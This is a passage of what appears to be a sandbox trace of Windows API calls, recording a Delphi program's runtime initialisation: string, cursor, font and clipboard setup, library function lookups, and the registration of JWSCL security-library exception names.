[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff3b, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff3a, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff39, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff38, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff37, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff36, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff35, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff34, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff33, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff32, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff31, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff30, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff4f, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff4e, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff4d, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff4c, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0120.486] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0120.486] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0120.486] GetCurrentThreadId () returned 0xfd4
[0120.486] GlobalAddAtomA (lpString="WndProcPtr029F000000000FD4") returned 0xc134
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfefc, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfefb, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfefa, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef9, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef8, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef7, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef6, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef5, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef4, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef3, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef2, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef1, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xfef0, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff0f, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0120.486] LoadStringA (in: hInstance=0x29f0000, uID=0xff0e, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff0d, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff0c, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff0b, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff0a, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff09, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff08, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff07, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff06, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff05, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff04, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff03, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff02, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff01, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff00, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1f, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1e, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1d, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1c, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1b, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff1a, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff19, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff18, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff17, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff16, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff15, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff14, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff13, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff12, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff11, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff10, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff2f, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0120.487] LoadStringA (in: hInstance=0x29f0000, uID=0xff2e, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0120.488] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0120.488] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0120.488] GetVersion () returned 0x1db10106
[0120.488] GetCurrentProcessId () returned 0xfd0
[0120.488] GlobalAddAtomA (lpString="Delphi00000FD0") returned 0xc139
[0120.488] GetCurrentThreadId () returned 0xfd4
[0120.488] GlobalAddAtomA (lpString="ControlOfs029F000000000FD4") returned 0xc133
[0120.488] RegisterClipboardFormatA (lpszFormat="ControlOfs029F000000000FD4") returned 0xc16a
[0120.488] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0120.488] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0120.488] GetSystemMetrics (nIndex=19) returned 1
[0120.488] GetSystemMetrics (nIndex=75) returned 1
[0120.488] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2b11320, fWinIni=0x0 | out: pvParam=0x2b11320) returned 1
[0120.488] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0120.488] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0120.488] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ff9) returned 0x120067
[0120.488] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0120.488] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0120.488] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0120.488] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ffa) returned 0x6022d
[0120.489] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ffb) returned 0x50217
[0120.489] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ffc) returned 0x50215
[0120.489] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ffd) returned 0x50203
[0120.489] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7fff) returned 0x50201
[0120.489] LoadCursorA (hInstance=0x29f0000, lpCursorName=0x7ffe) returned 0x501ff
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0120.490] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0120.490] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0120.490] GetDC (hWnd=0x0) returned 0x1801089c
[0120.490] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0120.490] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.490] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0120.490] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2a49a60, dwData=0x2b1156c) returned 1
[0120.490] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x16f13b, fWinIni=0x0 | out: pvParam=0x16f13b) returned 1
[0120.490] CreateFontIndirectA (lplf=0x16f13b) returned 0x170a082e
[0120.490] GetObjectA (in: h=0x170a082e, c=60, pv=0x16ef2c | out: pv=0x16ef2c) returned 60
[0120.490] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x16efe7, fWinIni=0x0 | out: pvParam=0x16efe7) returned 1
[0120.490] CreateFontIndirectA (lplf=0x16f0c3) returned 0x970a084a
[0120.490] GetObjectA (in: h=0x970a084a, c=60, pv=0x16ef2c | out: pv=0x16ef2c) returned 60
[0120.491] CreateFontIndirectA (lplf=0x16f087) returned 0x6c0a083c
[0120.491] GetObjectA (in: h=0x6c0a083c, c=60, pv=0x16ef2c | out: pv=0x16ef2c) returned 60
[0120.491] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0120.491] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f09b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.491] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x16f09b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0120.491] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x110000
[0120.491] GetKeyboardLayoutList (in: nBuff=64, lpList=0x16f01c | out: lpList=0x16f01c) returned 1
[0120.492] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0120.492] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0120.493] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0120.493] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0120.494] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0120.494] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0120.494] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0120.494] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0120.494] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0120.494] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0120.494] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0120.494] LoadStringA (in: hInstance=0x29f0000, uID=0xff59, lpBuffer=0x16ed7c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0120.494] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0120.494] LoadStringA (in: hInstance=0x29f0000, uID=0xff5a, lpBuffer=0x16ed7c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0120.494] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0120.494] LoadStringA (in: hInstance=0x29f0000, uID=0xff5b, lpBuffer=0x16ed7c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0120.494] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0120.494] LoadStringA (in: hInstance=0x29f0000, uID=0xff5c, lpBuffer=0x16ed7c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0120.495] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0120.495] SetErrorMode (uMode=0x8000) returned 0x1
[0120.495] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ceb0000
[0120.497] SetErrorMode (uMode=0x1) returned 0x8000
[0120.497] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePropertyFrame") returned 0x6ceb20ea
[0120.497] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreateFontIndirect") returned 0x6ceb20b7
[0120.497] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePictureIndirect") returned 0x6ceb20c8
[0120.497] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleLoadPicture") returned 0x6ceb20d9
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2adfa98*="EJwsclUnsupportedException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2adfa80*="EJwsclPIDException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2adfa68*="EJwsclJwShellExecuteException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2adfa50*="EJwsclShellExecuteException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2adfa38*="EJwsclElevationException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2adfa20*="EJwsclAbortException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2adfa08*="EJwsclSuRunErrorException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adf9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2adf9f0*="EJwsclElevateProcessException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adf9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2adf9d8*="EJwsclCertApiException") returned 1
[0120.497] SysReAllocStringLen (in: pbstr=0x2adf9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2adf9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2adf9a8*="EJwsclInvalidStartupInfo") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2adf990*="EJwsclFirewallNoExceptionsException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2adf978*="EJwsclFirewallInactiveException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2adf960*="EJwsclFirewallDelRuleException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2adf948*="EJwsclAddUdpPortToFirewallException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2adf930*="EJwsclAddTcpPortToFirewallException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2adf918*="EJwsclFirewallAddRuleException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2adf900*="EJwsclSetRemoteAdminAdressException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2adf8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2adf8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2adf8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2adf8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2adf888*="EJwsclGetIncomingPingAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2adf870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2adf858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2adf840*="EJwsclGetFWStateException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2adf828*="EJwsclSetFWStateException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2adf810*="EJwsclFirewallProfileInitException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2adf7f8*="EJwsclFirewallInitException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2adf7e0*="EJwsclGenericFirewallException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2adf7c8*="EJwsclEnumerateProcessFailed") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2adf7b0*="EJwsclInvalidRegistryPath") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2adf798*="EJwsclEndOfStream") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2adf780*="EJwsclClassTypeMismatch") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2adf768*="EJwsclInvalidHandle") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2adf750*="EJwsclInvalidIndex") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2adf738*="EJwsclInvalidSession") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2adf720*="EJwsclMissingEvent") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2adf708*="EJwsclInvalidPointerType") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2adf6f0*="EJwsclCreateProcessFailed") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2adf6d8*="EJwsclNilPointer") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2adf6c0*="EJwsclUnimplemented") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2adf6a8*="EJwsclInitWellKnownException") returned 1
[0120.498] SysReAllocStringLen (in: pbstr=0x2adf690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2adf690*="EJwsclKeyApiException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2adf678*="EJwsclKeyException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2adf660*="EJwsclHashApiException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2adf648*="EJwsclHashException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2adf630*="EJwsclCSPApiException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2adf618*="EJwsclCSPException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2adf600*="EJwsclTerminalSessionException") returned 1
